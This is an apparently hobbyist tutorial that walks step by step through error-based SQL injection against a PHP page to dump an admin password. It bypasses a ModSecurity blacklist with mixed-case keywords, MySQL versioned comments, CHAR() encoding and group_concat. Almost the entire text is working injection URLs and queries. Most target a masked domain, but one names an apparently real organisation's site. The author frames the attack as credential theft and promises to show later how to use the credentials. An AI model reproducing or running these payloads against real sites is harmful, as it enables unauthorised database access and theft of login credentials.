SQL injection is one of the most dangerous attack on websites. Many manually created dynamic website do not have input filtration and thus leveraging themselves to this attack. This article will guide you on how to perform SQL Injection to get the admin password in a modsecurity environment in which the union and select command are blacklisted and Error 406 comes up whenever you use those command.
I will not be using any screenshots on this article, just the commands will be shown. I will be using dadadada.com to mask the original site and I will show you how to perform SQL Injection.
http://dadadada.com/page.php?data=9 //this is the link which we will be exploiting.
Let’s find out if it is vulnerable to SQL Injection:
http://dadadada.com/page.php?data=9′ //a single quote after 9 will be enough to figure out. The page will produce an SQL written error :OR
It will not be loaded properly in case of Blind SQL Injection.
We got syntax error that means our injection will be based on errors.
Step 2: Soon after I got that error above. I started Looking for number of columns.
http://dadadada.com/page.php?data=9 order by 1– //page loaded fine
http://dadadada.com/page.php?data=9 order by 2– //page loaded fine
http://dadadada.com/page.php?data=9 order by 10 — //page gave me an error with unknown column clause. That simple means our columns are upto 9 here.
Step 3: Look for the vulnerable column in those 9 columns. That is the one column which will generate an output for the queries that we are going to use.
http://dadadada.com/page.php?data=9 union select 1,2,3,4,5,6,7,8,9– // This query must produce a number output on the page, that number column is the one which is vulnerable to injection.
Got this output instead:
Now, This is an error generated by mod security in Apache which means the command we are providing is NOT Acceptable here.
We need to find a way to Bypass this error. I have tried a lot of strings to finally able to bypass this:
You can try: 9 UniOn SeLeCt 1,2,3,4,5,6,7,8,9 —
9 /*!50000UniOn*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9–
The above query certainly going to work on the version above 5 on SQL and It does bypass the Not Acceptable error above.
The vulnerable column here comes as 3.
Step 4: Gather information about the SQL Version,User and Database.
For Finding Version: 9 /*!50000UniOn*/ /*!50000SeLeCt*/ 1,2,@@Version,4,5,6,7,8,9–
For Finding Current user: 9 /*!50000UniOn*/ /*!50000SeLeCt*/ 1,2,current_user(),4,5,6,7,8,9–
For Finding Database: 9 /*!50000UniOn*/ /*!50000SeLeCt*/ 1,2,database(),4,5,6,7,8,9–
Check the Privilege for Your User: http://pakhcnewdelhi.org.pk/page.php?data=9 /*!50000UnIoN*/ ALL /*!50000SeLeCt*/+1,2,/*!50000GrouP_ConCat(Grantee,0x3a,IS_Grantable)*/,4,5,6,7,8,9 from /*!50000InFormaTion_SChema.user_privileges */–
My user here is not privileged to execute some of the important commands. Guess I will stick to admin password in this article.
For Finding Hostname: 9 /*!50000UniOn*/ /*!50000SeLeCt*/ 1,2,@@hostname,4,5,6,7,8,9 —
Step 5: Let’s find different tables in our database:
http://dadadada.com/page.php?data=9 /*!50000UnIoN*/ /*!50000SeLeCt*/+1,2,table_name,4,5,6,7,8,9 from /*!50000inForMatIon_sCheMa.tabLes*/ where table_schema=database()–
This command will list the tables and we need to find the admin or users table. In the list I found a table named ‘Users’.
Now, I need to check the columns in users table:
9 /*!50000UnIoN*/ /*!50000SeLeCt*/+1,2,column_name,4,5,6,7,8,9 from /*!50000inForMatIon_sCheMa.columns*/ where table_name=CHAR(117, 115, 101, 114, 115)–
The CHAR(117, 115, 101, 114, 115) command simply changes the users string to character codes. SQL takes these character codes. Simply writing users as table_name was giving me an error because the single quotes are needed and I cannot put users in single quotes here because doing so will generate error which is not the kind of output I want.
I got 5 columns in users table and Now I need to find the what users it have. So I used the below query to get it done:
9 /*!50000UnIoN*/ /*!50000SeLeCt*/ +1,2,/*!50000gRoUp_cOncAt(user_id,0x3a,login,0x3a,password)*/ ,4,5,6,7,8,9 from users–
OUTPUT on page :I have removed some of the letters in this. I think you all know why.This is how you gain admin password using SQL injection. In the next article, I will be telling you where to use those credentials.Ciao for now!